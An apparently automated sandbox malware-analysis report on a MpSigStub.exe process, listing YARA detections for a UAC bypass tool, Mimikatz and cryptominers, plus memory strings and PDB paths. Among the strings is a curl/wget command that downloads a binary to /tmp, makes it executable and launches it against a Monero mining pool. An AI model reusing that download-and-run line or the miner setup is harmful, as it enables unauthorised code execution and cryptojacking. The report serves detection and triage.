Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

Exploits:

Yara detected UACMe UAC Bypass tool

Show sources

Source: Yara match	File source: 00000023.00000003.6275312196.0000028BD7491000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6271903950.0000028BD6A3F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Privilege Escalation:

Detected Hacktool Mimikatz

Show sources

Source: MpSigStub.exe, 00000023.00000003.6435347740.0000028BD7C0A000.00000004.00000001.sdmp

String found in binary or memory: blog.gentilkiwi.com/mimikatz

Bitcoin Miner:

Yara detected Xmrig cryptocurrency miner

Show sources

Source: Yara match	File source: 35.3.MpSigStub.exe.28bd63a15c6.205.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd772c1c6.109.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd736083d.96.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd77beebe.15.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd7098dc6.98.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd63a2bca.206.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd7ec89ca.90.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd7ecabce.191.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd7ecabce.89.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd772c9ca.108.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd62a62ea.169.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd62ff37e.139.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd77beebe.25.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd7a92f79.137.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd7870281.51.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd7098dc6.64.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd62a62ea.73.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd7ec89ca.192.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd7361111.94.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd62c32d4.74.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd7098dc6.214.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd7886c25.53.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd62c32d4.170.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd772d1ce.107.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd7889079.52.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd7098dc6.214.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd7361a65.95.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd7098dc6.98.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd778bb0d.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd7098dc6.64.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd62c283a.76.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd62c2d87.172.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd62c283a.171.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd77beebe.15.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd62c2d87.75.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd77beebe.25.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd780418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd7aaa38f.136.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd780418a.59.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000023.00000003.6315879958.0000028BD6D14000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6282670643.0000028BD7070000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6264485610.0000028BD7D13000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6317668915.0000028BD6D56000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6437420306.0000028BD7B02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6345125997.0000028BD6D56000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6265722092.0000028BD77B8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6326794298.0000028BD64F4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6269974258.0000028BD77B8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6340606272.0000028BD78F3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6341899374.0000028BD6D56000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6339082124.0000028BD7EB5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6330808823.0000028BD64F4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6312196496.0000028BD70F5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6305464629.0000028BD7725000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6338449567.0000028BD8082000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6321698835.0000028BD64F4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6303687995.0000028BD6EE5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6277372616.0000028BD786E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6316150838.0000028BD6D56000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6344420092.0000028BD7070000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6264075284.0000028BD8107000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6299891132.0000028BD7070000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6292767693.0000028BD7F7B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6296840471.0000028BD7347000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6438769310.0000028BD7F39000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6318060550.0000028BD7A7F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6284121658.0000028BD64F4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6294570357.0000028BD7EB4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6317125613.0000028BD6C91000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6338346630.0000028BD733C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6310027848.0000028BD8082000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6282961298.0000028BD6AC6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected Coinhive miner

Show sources

Source: Yara match	File source: 35.3.MpSigStub.exe.28bd680fb5a.152.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd67c4b16.150.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd680fb5a.221.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd6078d79.112.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd7421296.87.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd7ec89ca.90.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd680fb5a.211.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd710f28f.126.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd7ecabce.191.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd7ecabce.89.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd62ff37e.139.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd64e41a6.68.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd7421296.110.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd7421296.175.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd677d89d.195.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd680fb5a.198.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd64e4daa.69.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd677fef1.196.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd7ec89ca.192.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd62c32d4.74.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd64e5bae.67.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd607b3cd.111.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd62c32d4.170.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd7098dc6.214.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd67c4b16.150.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd6697177.158.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd7098dc6.98.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd7098dc6.64.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd62c283a.76.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd62c2d87.172.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd62c283a.171.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd6694af5.157.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd62c2d87.75.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd780418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd780418a.59.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000023.00000003.6334830370.0000028BD7708000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6315879958.0000028BD6D14000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6422489024.0000028BD6EA1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6409405553.0000028BD6EA1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6326325485.0000028BD642E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6291965399.0000028BD7440000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6326794298.0000028BD64F4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6300664525.0000028BD7A3C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6399408556.0000028BD6EA1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6316751945.0000028BD7A3C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6407852134.0000028BD6E91000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6408458380.0000028BD6EA1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6405856828.0000028BD6E61000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6302159310.0000028BD7C4C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6268258204.0000028BD6EA2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6408913892.0000028BD6EA1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6290474663.0000028BD5FE4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6337910603.0000028BD7708000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6339082124.0000028BD7EB5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6330808823.0000028BD64F4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6286809278.0000028BD6A80000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6325684988.0000028BD66A2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6315036458.0000028BD60E4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6312196496.0000028BD70F5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6307279106.0000028BD6061000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6307602633.0000028BD60E4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6338449567.0000028BD8082000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6321698835.0000028BD64F4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6299135359.0000028BD5FE4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6338116203.0000028BD7305000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6283884268.0000028BD64D2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6320629595.0000028BD71FC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6399025086.0000028BD6EA1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6349322522.0000028BD67F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6306591281.0000028BD7440000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6340321135.0000028BD67F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6346082988.0000028BD6579000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6332134086.0000028BD7440000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6264075284.0000028BD8107000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6423998600.0000028BD6EA1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6398582086.0000028BD6E91000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6266904104.0000028BD642E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6336368207.0000028BD7C4C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6332319497.0000028BD7A3C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6308819602.0000028BD71FC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6272308582.0000028BD6A80000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6311853685.0000028BD7A3C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6271903950.0000028BD6A3F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6284121658.0000028BD64F4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6339973088.0000028BD6769000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6294570357.0000028BD7EB4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6313262116.0000028BD723F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6317125613.0000028BD6C91000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6311571113.0000028BD79D4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6323124773.0000028BD67F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6296311842.0000028BD60E4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6310027848.0000028BD8082000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6299498937.0000028BD6FED000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6333790916.0000028BD7708000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6282961298.0000028BD6AC6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6418803000.0000028BD6E91000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6423203923.0000028BD6EA1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6399846790.0000028BD6EA1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected BitCoin Miner

Show sources

Source: Yara match	File source: 35.3.MpSigStub.exe.28bd7b2bc01.176.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd7b2bc01.58.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd7b2bc01.215.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd7b2bc01.138.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd780418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd7aaa38f.136.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd780418a.59.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6332769584.0000028BD7B02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6318490215.0000028BD7B02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6344793289.0000028BD7B02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Found strings related to Crypto-Mining

Show sources

Source: MpSigStub.exe, 00000023.00000003.6264485610.0000028BD7D13000.00000004.00000001.sdmp	String found in binary or memory: stratum+tcp://
Source: MpSigStub.exe, 00000023.00000003.6315879958.0000028BD6D14000.00000004.00000001.sdmp	String found in binary or memory: pools.txt
Source: MpSigStub.exe, 00000023.00000003.6309579817.0000028BD8040000.00000004.00000001.sdmp	String found in binary or memory: href="https://platform.jsecoin.com/?lander=1&utm_source=referral&utm_campaign=aff'
Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp	String found in binary or memory: /cryptonight
Source: MpSigStub.exe, 00000023.00000003.6264485610.0000028BD7D13000.00000004.00000001.sdmp	String found in binary or memory: stratum+tcp://
Source: MpSigStub.exe, 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmp	String found in binary or memory: xmrminer
Source: MpSigStub.exe, 00000023.00000003.6277372616.0000028BD786E000.00000004.00000001.sdmp	String found in binary or memory: URL of mining server
Source: MpSigStub.exe, 00000023.00000003.6315879958.0000028BD6D14000.00000004.00000001.sdmp	String found in binary or memory: XMR-Stak-CPU mining software, CPU Version.
Source: MpSigStub.exe, 00000023.00000003.6313733707.0000028BD7280000.00000004.00000001.sdmp	String found in binary or memory: \nscpucnminer\img001.exe
Source: MpSigStub.exe, 00000023.00000003.6288686675.0000028BD7BA5000.00000004.00000001.sdmp	String found in binary or memory: (){psauxf\|grep-vgrep\|grep"mine.moneropool.com"\|awk'
Source: MpSigStub.exe, 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmp	String found in binary or memory: Usage: xmrig [OPTIONS]
Source: MpSigStub.exe, 00000023.00000003.6313733707.0000028BD7280000.00000004.00000001.sdmp	String found in binary or memory: \nscpucnminer\img001.exe
Source: MpSigStub.exe, 00000023.00000003.6317668915.0000028BD6D56000.00000004.00000001.sdmp	String found in binary or memory: curl-fssl${url}/h2-o/tmp/avalonsaber\|\|wget-q${url}/h2-o/tmp/avalonsaber)&&chmod+x/tmp/avalonsabernohup/tmp/avalonsaber-opool.minexmr.com
Source: MpSigStub.exe, 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp	String found in binary or memory: mv %s/xmrig %s

Source: FAKTURA I PARAGONY.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: unknown	HTTPS traffic detected: 172.217.168.46:443 -> 192.168.11.20:49785 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.161:443 -> 192.168.11.20:49786 version: TLS 1.2

Source:	Binary string: \Release\runner.pdb source: MpSigStub.exe, 00000023.00000003.6320629595.0000028BD71FC000.00000004.00000001.sdmp
Source:	Binary string: ASAM\original\delfiletype\delfiletype\obj\Release\delfiletype.pdb source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp
Source:	Binary string: oyvmhvtgei\bmjc\fee.pdb source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmp
Source:	Binary string: Release\arc_2010.pdb source: MpSigStub.exe, 00000023.00000003.6328027500.0000028BD6832000.00000004.00000001.sdmp
Source:	Binary string: \fcrypt\Release\S\s_high.pdb source: MpSigStub.exe, 00000023.00000003.6286232837.0000028BD6261000.00000004.00000001.sdmp
Source:	Binary string: \natchat-master\x64\Release\natchat.pdb source: MpSigStub.exe, 00000023.00000003.6282378484.0000028BD702F000.00000004.00000001.sdmp
Source:	Binary string: c:\1\rich\look\80\24\Famous\35\72\special\22\melody.pdb source: MpSigStub.exe, 00000023.00000003.6282378484.0000028BD702F000.00000004.00000001.sdmp
Source:	Binary string: CFy92ROzKls\ro\HwtAF.pdb source: MpSigStub.exe, 00000023.00000003.6434103017.0000028BD7BC7000.00000004.00000001.sdmp
Source:	Binary string: -:\MySpys\chrome_cookie_view\Release\crome.pdb source: MpSigStub.exe, 00000023.00000003.6340606272.0000028BD78F3000.00000004.00000001.sdmp
Source:	Binary string: cts\AKL\kh\Release\kh.pdb source: MpSigStub.exe, 00000023.00000003.6315036458.0000028BD60E4000.00000004.00000001.sdmp
Source:	Binary string: *.pdb.\|!\binplace.exe source: MpSigStub.exe, 00000023.00000003.6280069144.0000028BD7AC1000.00000004.00000001.sdmp
Source:	Binary string: .C:\SlackDismort\third\Release\SlackDismort.pdbat source: MpSigStub.exe, 00000023.00000003.6328027500.0000028BD6832000.00000004.00000001.sdmp
Source:	Binary string: C:\Proyectos\desktop_apps\Updater\UpdaterVittalia\obj\Release\UpdaterService.pdbxx source: MpSigStub.exe, 00000023.00000003.6305464629.0000028BD7725000.00000004.00000001.sdmp
Source:	Binary string: dciman32.pdb source: MpSigStub.exe, 00000023.00000003.6284624022.0000028BD68F5000.00000004.00000001.sdmp
Source:	Binary string: \BeamWinHTTP\Release\BeamWinHTTP.pdb source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp
Source:	Binary string: msmdsrv.pdb source: MpSigStub.exe, 00000023.00000003.6315879958.0000028BD6D14000.00000004.00000001.sdmp
Source:	Binary string: Release\NexGenMediaPlayerApp.pdb source: MpSigStub.exe, 00000023.00000003.6276951583.0000028BD782D000.00000004.00000001.sdmp
Source:	Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\mshta\objfre\i386\mshta.pdb source: MpSigStub.exe, 00000023.00000003.6303687995.0000028BD6EE5000.00000004.00000001.sdmp
Source:	Binary string: he#@1.Pdb source: MpSigStub.exe, 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp
Source:	Binary string: heerhWHW#@1wHJnERbRW.Pdb source: MpSigStub.exe, 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp
Source:	Binary string: LMIGuardianSvc.pdb source: MpSigStub.exe, 00000023.00000003.6300664525.0000028BD7A3C000.00000004.00000001.sdmp
Source:	Binary string: \Release\gogodele.pdb source: MpSigStub.exe, 00000023.00000003.6430356442.0000028BD7C4C000.00000004.00000001.sdmp
Source:	Binary string: +020202020202020202020202020202020202020.pdb source: MpSigStub.exe, 00000023.00000003.6295888912.0000028BD60A3000.00000004.00000001.sdmp
Source:	Binary string: \\Desktop\\.+\.pdb source: MpSigStub.exe, 00000023.00000003.6293840071.0000028BD7E72000.00000004.00000001.sdmp
Source:	Binary string: N%Tray Me !.*\\Release\\Tray Me !\.pdb source: MpSigStub.exe, 00000023.00000003.6293840071.0000028BD7E72000.00000004.00000001.sdmp
Source:	Binary string: \bin\DownloaderExe.pdb source: MpSigStub.exe, 00000023.00000003.6322023418.0000028BD7EF7000.00000004.00000001.sdmp
Source:	Binary string: SpeedNewASK\Debug\spdfrmon.pdb source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmp
Source:	Binary string: fastfat.pdbN source: MpSigStub.exe, 00000023.00000003.6335925716.0000028BD63AB000.00000004.00000001.sdmp
Source:	Binary string: \release\LSASecretsDump.pdb source: MpSigStub.exe, 00000023.00000003.6274482455.0000028BD75C0000.00000004.00000001.sdmp
